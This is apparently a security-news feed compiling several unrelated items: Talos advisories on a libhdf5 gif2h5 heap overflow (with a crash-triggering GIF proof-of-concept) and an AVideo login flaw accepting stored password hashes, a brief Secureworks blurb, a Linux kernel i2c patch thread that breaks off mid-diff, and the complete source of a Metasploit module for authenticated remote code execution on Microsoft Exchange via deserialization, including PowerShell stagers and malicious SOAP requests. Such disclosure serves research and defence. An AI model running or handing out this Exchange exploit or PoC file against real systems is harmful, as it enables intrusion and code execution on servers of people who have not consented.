A heap-based buffer overflow vulnerability exists in the gif2h5 functionality of HDF5 Group libhdf5 1.10.4. A specially-crafted GIF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the gif2h5 functionality of HDF5 Group libhdf5 1.10.4. A specially-crafted GIF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

HDF5 Group libhdf5 1.10.4

**PRODUCT URLS**

libhdf5 - https://www.hdfgroup.org

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

HDF5 is a file format that is maintained by a non-profit organization, the HDF Group. HDF5 is designed to store and organize large amounts of scientific data. It is used to exchange data structures between applications in industries (such as the GIS industry) via libraries such as GDAL, OGR or as part of software like ArcGIS.

Their included gif2h5 tool is used for converting GIF data to the HDF5 file format.

The vulnerability exists in their gif2h5 tool/library, specifically in ReadGifHeader() function while attempting to convert GIF files to their HDF5 format. The vulnerability exists due to a failure to check the size of an allocated heap buffer while writing and parsing GIF image data stream.

When attempting to parse the GIF local image descriptor, a buffer is allocated based on the width and height of the image to store the image data stream. We can see this occur in gifread.c under the ReadGifImageDesc() function:

    186     if (!(GifImageDesc->GIFImage =
    187               (GIFBYTE *)malloc((GifImageDesc->ImageWidth) * (GifImageDesc->ImageHeight)))) {  // Malloc here
    188         printf("Out of memory");
    189         exit(EXIT_FAILURE);
    190     }
    

In this case we are using an image that is 5x5, so malloc(0x19) is called which returns a chunk of usable size, 0x28 (40). Following this, the data stream is read and written to the GifImageDesc->GIFImage member without any bounds checking. It instead relies on valid block size values, allowing an attacker to arbitrarily write data beyond the bounds of the heap buffer. This can lead to code execution.

    192	     TempPtr = GifImageDesc->GIFImage;
    /*
           Here we can see our allocated buffer at 0x555555a840a0:
           gef➤  hexdump TempPtr 
           0x0000555555a840a0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
           0x0000555555a840b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
           0x0000555555a840c0     00 00 00 00 00 00 00 00 41 ff 01 00 00 00 00 00    ........A.......
           0x0000555555a840d0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
     */
    193	     do {
    194	         ch = ch1 = (int)*(*MemGif2)++;  
    195	         while (ch--)
    196	             *TempPtr++ = *(*MemGif2)++;
    197	     } while (ch1);
    198	 
    199	     return (0); /* No FILE stream error occured */
    

Here, we can see that we have written data well beyond the bounds of the heap buffer.

    gef➤  hexdump 0x0000555555a840a0 256
    0x0000555555a840a0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a840b0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a840c0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a840d0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a840e0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a840f0     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84100     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84110     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84120     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84130     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84140     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84150     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84160     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
    0x0000555555a84170     41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00    AAAAAAAAAAAAA...
    

Leading to a crash:

    malloc(): corrupted top size
    Program received signal SIGABRT, Aborted.
    

**Exploit Proof of Concept**

GIF file

    00000000: 4749 4638 396c 0a00 0300 020d 188e b9fd  GIF89l..........
    00000010: 616c 0e00 2c00 0003 0005 0005 0000 0041  al..,..........A
    00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000030: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000040: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000050: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000070: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000080: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000090: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000a0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000b0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000c0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000d0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000e0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    000000f0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    
    $ gif2h5 PoC.gif test.h5
    Unknown Block Separator Character: 0x8e
    Unknown Block Separator Character: 0xb9
    Unknown Block Separator Character: 0xfd
    Unknown Block Separator Character: 0x61
    Unknown Block Separator Character: 0x6c
    Unknown Block Separator Character: 0xe
    Unknown Block Separator Character: 00
    malloc(): corrupted top size
    [1]    449683 abort (core dumped)  gif2h5 access_violation.min.gif test.h5
    

**TIMELINE**

2022-03-21 - Vendor Disclosure  
2022-08-16 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-26061: TALOS-2022-1487 || Cisco Talos Intelligence Group

An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users' password hash will be able to use it to directly login into the account, leading to increased privileges.

**SUMMARY**

An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users’ password hash will be able to use it to directly login into the account, leading to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-836 - Use of Password Hash Instead of Password for Authentication

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo, by default, saves a user’s password as a salted hash in the database. When a user tries to login, the function login, defined in the User class in objects/user.php, is called:

    public function login($noPass = false, $encodedPass = false, $ignoreEmailVerification = false) {
        if (User::isLogged()) {
            return false;
        }
        ...
        if (strtolower($encodedPass) === 'false') {
            $encodedPass = false;
        }
        //_error_log("user::login: noPass = $noPass, encodedPass = $encodedPass, this->user, $this->user " . getRealIpAddr());
        if ($noPass) {
            $user = $this->find($this->user, false, true);
        } else {
            $user = $this->find($this->user, $this->password, true, $encodedPass);
        }
        ...
    

Password check is relayed to the find function, passing user and password as arguments:

    private function find($user, $pass, $mustBeactive = false, $encodedPass = false) {
        ...
        $sql = "SELECT * FROM users WHERE user = ? ";
        ...
        $sql .= " LIMIT 1";
        $res = sqlDAL::readSql($sql, $formats, $values, true);
        $result = sqlDAL::fetchAssoc($res);
        sqlDAL::close($res);
        if (!empty($result)) {
            if ($pass !== false) {
                if (!encryptPasswordVerify($pass, $result['password'], $encodedPass)) { // [1]
                    if (!empty($advancedCustom) && $advancedCustom->enableOldPassHashCheck) {
                        _error_log("Password check new hash pass does not match, trying MD5");
                        return $this->find_Old($user, $pass, $mustBeactive, $encodedPass);
                    } else {
                        return false;
                    }
                }
            }
            $user = $result;
        } else {
            _error_log("Password check new hash user not found");
            //check if is the old password style
            $user = false;
            //$user = false;
        }
        return $user;
    

The function fetches the user record from the database, and uses encryptPasswordVerify to check if the password matches:

    function encryptPasswordVerify($password, $hash, $encodedPass = false) {
        global $advancedCustom, $global;
        if (!$encodedPass || $encodedPass === 'false') {
            //_error_log("encryptPasswordVerify: encrypt");
            $passwordSalted = encryptPassword($password);
            // in case you enable the salt later
            $passwordUnSalted = encryptPassword($password, true);
        } else {
            //_error_log("encryptPasswordVerify: do not encrypt");
            $passwordSalted = $password;
            // in case you enable the salt later
            $passwordUnSalted = $password;
        }
        //_error_log("passwordSalted = $passwordSalted,  hash=$hash, passwordUnSalted=$passwordUnSalted");
        return $passwordSalted === $hash || $passwordUnSalted === $hash || $password === $hash; // [2]
    }
    

The password is encrypted in the same way it was stored in the database (using encryptPassword), however this function allows 3 different passwords to match: the salted hash of $password, the unsalted hash of $password, and whatever hash is stored in the database (the $password === $hash). This means that the hash as stored in the database can be used as a password to login. Any SQL injection vulnerability can thus be used to dump the administrator’s password hash and use that exact hash to login via the web interface.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-32282: TALOS-2022-1545 || Cisco Talos Intelligence Group

Secureworks’ Nash Borges describes how his team has applied AI and ML to threat detection.

The marketing hyperbole is plenty loud when it comes to artificial intelligence and its subset, machine learning, in the SOC and data center, and Secureworks’ Nash Borges offers a reality check on the emerging technologies. Borges takes a deeper cut at what it takes to add AI into the technology mix in a SOC. In a practical example, he describes how his team has applied AI and ML to threat detection. Borges also addresses whether AI is the panacea it’s built up to be for security management.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Secureworks: How To Distinguish Hype From Reality With AI in SecOps

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'nokogiri'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Powershell  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Deprecated  moved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE',        'Description' => %q{          This module exploits vulnerabilities within the ChainedSerializationBinder as used in          Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and          Exchange Server 2016 CU22 all prior to Mar22SU.          Note that authentication is required to exploit these vulnerabilities.        },        'Author' => [          'pwnforsp', # Original Bug Discovery          'zcgonvh', # Of 360 noah lab, Original Bug Discovery          'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild          'Microsoft Security Response Center', # Discovery of exploitation in the wild          'peterjson', # Writeup          'testanull', # PoC Exploit          'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D          'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains          'Markus Wulftange' # CVE-2022-23277 research        ],        'References' => [          # CVE-2021-42321 references          ['CVE', '2021-42321'],          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],          ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],          ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],          ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],          ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'],          # CVE-2022-23277 references          ['CVE', '2022-23277'],          ['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'],          ['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c']        ],        'DisclosureDate' => '2021-12-09',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'HttpClientTimeout' => 5,          'WfsDelay' => 10        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169            CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.          ]        }      )    )    register_options([      Opt::RPORT(443),      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']),      OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server'])    ])  end  def post_auth?    true  end  def username    datastore['HttpUsername']  end  def password    datastore['HttpPassword']  end  def cve_2021_42321_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21      '15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22      '15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10      '15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11    ]  end  def cve_2022_23277_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU      '15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU      '15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU      '15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU      '15.2.922.19', # Exchange Server 2019 CU10 Nov21SU      '15.2.922.20', # Exchange Server 2019 CU10 Jan22SU      '15.2.986.14', # Exchange Server 2019 CU11 Nov21SU      '15.2.986.15'  # Exchange Server 2019 CU11 Jan22SU    ]  end  def check    # Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version    current_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)    if current_build_rex.nil?      return CheckCode::Unknown("Couldn't retrieve the target Exchange Server version!")    end    @exchange_build = current_build_rex.to_s    if cve_2021_42321_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321")    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277")    else      CheckCode::Safe("Exchange Server #{@exchange_build} does not appear to be a vulnerable version!")    end  end  def exploit    if @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it      @exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s      if @exchange_build.nil?        fail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.')      end    end    if cve_2021_42321_vuln_builds.include?(@exchange_build)      @gadget_chain = :ClaimsPrincipal    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      @gadget_chain = :DataSetTypeSpoof    else      fail_with(Failure::NotVulnerable, "Exchange Server #{@exchange_build} is not a vulnerable version!")    end    case target['Type']    when :win_cmd      execute_command(payload.encoded)    when :win_dropper      execute_cmdstager    when :psh_stager      execute_command(cmd_psh_payload(        payload.encoded,        payload.arch.first,        remove_comspec: true      ))    end  end  def execute_command(cmd, _opts = {})    # Get the user's inbox folder's ID and change key ID.    print_status("Getting the user's inbox folder's ID and ChangeKey ID...")    xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>      <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>      <m:GetFolder>        <m:FolderShape>        <t:BaseShape>AllProperties</t:BaseShape>        </m:FolderShape>        <m:FolderIds>        <t:DistinguishedFolderId Id="inbox" />        </m:FolderIds>      </m:GetFolder>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_getfolder_inbox,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.code == 401      fail_with(Failure::NoAccess, "Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\#{username}")    end    xml_getfolder = res.get_xml_document    xml_getfolder.remove_namespaces!    xml_tag = xml_getfolder.xpath('//FolderId')    if xml_tag.empty?      print_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!')      fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')    end    unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')      fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')    end    change_key_val = xml_tag.attribute('ChangeKey').value    folder_id_val = xml_tag.attribute('Id').value    print_good("ChangeKey value for Inbox folder is #{change_key_val}")    print_good("ID value for Inbox folder is #{folder_id_val}")    # Delete the user configuration object that currently on the Inbox folder.    print_status('Deleting the user configuration object associated with Inbox folder...')    xml_delete_inbox_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:DeleteUserConfiguration>          <m:UserConfigurationName Name="ExtensionMasterTable">            <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />          </m:UserConfigurationName>        </m:DeleteUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_delete_inbox_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}      print_good('Successfully deleted the user configuration object associated with the Inbox folder!')    else      print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')      print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')    end    # Now to replace the deleted user configuration object with our own user configuration object.    print_status('Creating the malicious user configuration object on the Inbox folder!')    xml_malicious_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:CreateUserConfiguration>          <m:UserConfiguration>            <t:UserConfigurationName Name="ExtensionMasterTable">              <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />            </t:UserConfigurationName>            <t:Dictionary>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgChkTm</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Integer64</t:Type>                  <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgDO</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Boolean</t:Type>                  <t:Value>false</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>            </t:Dictionary>            <t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData>          </m:UserConfiguration>        </m:CreateUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_malicious_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}      fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')    end    print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')    # Deserialize our object. If all goes well, you should now have SYSTEM :)    print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')    xml_get_client_access_token = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:GetClientAccessToken>          <m:TokenRequests>            <t:TokenRequest>              <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>              <t:TokenType>CallerIdentity</t:TokenType>            </t:TokenRequest>          </m:TokenRequests>        </m:GetClientAccessToken>      </soap:Body>    </soap:Envelope>)    begin      send_request_cgi(        {          'method' => 'POST',          'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),          'data' => xml_get_client_access_token,          'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.        }      )    rescue Errno::ECONNRESET      # when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised    end  endend

Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution

An out-of-bounds memory access flaw was found in the Linux kernel Intel’s iSMT SMBus host controller driver in the way a user triggers the I2C_SMBUS_BLOCK_DATA (with the ioctl I2C_SMBUS) with malicious input data. This flaw allows a local user to crash the system.

\* **\[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access()**
**@ 2022-07-29  9:34 Zheyu Ma**
  0 siblings, 0 replies; 2+ messages in thread
From: Zheyu Ma @ 2022-07-29  9:34 UTC (permalink / raw)
  Cc: Zheyu Ma, linux-kernel

When the driver does not check the data from the user, the variable
'data->block\[0\]' may be very large to cause an out-of-bounds bug.

The following log can reveal it:

\[   33.995542\] i2c i2c-1: ioctl, cmd=0x720, arg=0x7ffcb3dc3a20
\[   33.995978\] ismt\_smbus 0000:00:05.0: I2C\_SMBUS\_BLOCK\_DATA:  WRITE
\[   33.996475\] ==================================================================
\[   33.996995\] BUG: KASAN: out-of-bounds in ismt\_access.cold+0x374/0x214b
\[   33.997473\] Read of size 18446744073709551615 at addr ffff88810efcfdb1 by task ismt\_poc/485
\[   33.999450\] Call Trace:
\[   34.001849\]  memcpy+0x20/0x60
\[   34.002077\]  ismt\_access.cold+0x374/0x214b
\[   34.003382\]  \_\_i2c\_smbus\_xfer+0x44f/0xfb0
\[   34.004007\]  i2c\_smbus\_xfer+0x10a/0x390
\[   34.004291\]  i2cdev\_ioctl\_smbus+0x2c8/0x710
\[   34.005196\]  i2cdev\_ioctl+0x5ec/0x74c

Fix this bug by checking the size of 'data->block\[0\]' first.

Fixes: 13f35ac14cd0 ("i2c: Adding support for Intel iSMT SMBus 2.0 host controller")
Signed-off-by: Zheyu Ma <zheyuma97@gmail.com>
---
 drivers/i2c/busses/i2c-ismt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
index 6078fa0c0d48..63120c41354c 100644
--- a/drivers/i2c/busses/i2c-ismt.c
+++ b/drivers/i2c/busses/i2c-ismt.c
@@ -509,6 +509,9 @@ static int ismt\_access(struct i2c\_adapter \*adap, u16 addr,
 		if (read\_write == I2C\_SMBUS\_WRITE) {
 			/\* Block Write \*/
 			dev\_dbg(dev, "I2C\_SMBUS\_BLOCK\_DATA:  WRITE\\n");
+			if (data->block\[0\] < 1 || data->block\[0\] > I2C\_SMBUS\_BLOCK\_MAX)
+				return -EINVAL;
+
 			dma\_size = data->block\[0\] + 1;
 			dma\_direction = DMA\_TO\_DEVICE;
 			desc->wr\_len\_cmd = dma\_size;
-- 
2.25.1

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

\* **\[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access()**
**@ 2022-07-29 11:02 Zheyu Ma**
  0 siblings, 0 replies; 2+ messages in thread
From: Zheyu Ma @ 2022-07-29 11:02 UTC (permalink / raw)
  To: Seth Heasley, Neil Horman, Jean Delvare, Bill Brown, Wolfram Sang
  Cc: Zheyu Ma, linux-i2c, linux-kernel

When the driver does not check the data from the user, the variable
'data->block\[0\]' may be very large to cause an out-of-bounds bug.

The following log can reveal it:

\[   33.995542\] i2c i2c-1: ioctl, cmd=0x720, arg=0x7ffcb3dc3a20
\[   33.995978\] ismt\_smbus 0000:00:05.0: I2C\_SMBUS\_BLOCK\_DATA:  WRITE
\[   33.996475\] ==================================================================
\[   33.996995\] BUG: KASAN: out-of-bounds in ismt\_access.cold+0x374/0x214b
\[   33.997473\] Read of size 18446744073709551615 at addr ffff88810efcfdb1 by task ismt\_poc/485
\[   33.999450\] Call Trace:
\[   34.001849\]  memcpy+0x20/0x60
\[   34.002077\]  ismt\_access.cold+0x374/0x214b
\[   34.003382\]  \_\_i2c\_smbus\_xfer+0x44f/0xfb0
\[   34.004007\]  i2c\_smbus\_xfer+0x10a/0x390
\[   34.004291\]  i2cdev\_ioctl\_smbus+0x2c8/0x710
\[   34.005196\]  i2cdev\_ioctl+0x5ec/0x74c

Fix this bug by checking the size of 'data->block\[0\]' first.

Fixes: 13f35ac14cd0 ("i2c: Adding support for Intel iSMT SMBus 2.0 host controller")
Signed-off-by: Zheyu Ma <zheyuma97@gmail.com>
---
 drivers/i2c/busses/i2c-ismt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
index 6078fa0c0d48..63120c41354c 100644
--- a/drivers/i2c/busses/i2c-ismt.c
+++ b/drivers/i2c/busses/i2c-ismt.c
@@ -509,6 +509,9 @@ static int ismt\_access(struct i2c\_adapter \*adap, u16 addr,
 		if (read\_write == I2C\_SMBUS\_WRITE) {
 			/\* Block Write \*/
 			dev\_dbg(dev, "I2C\_SMBUS\_BLOCK\_DATA:  WRITE\\n");
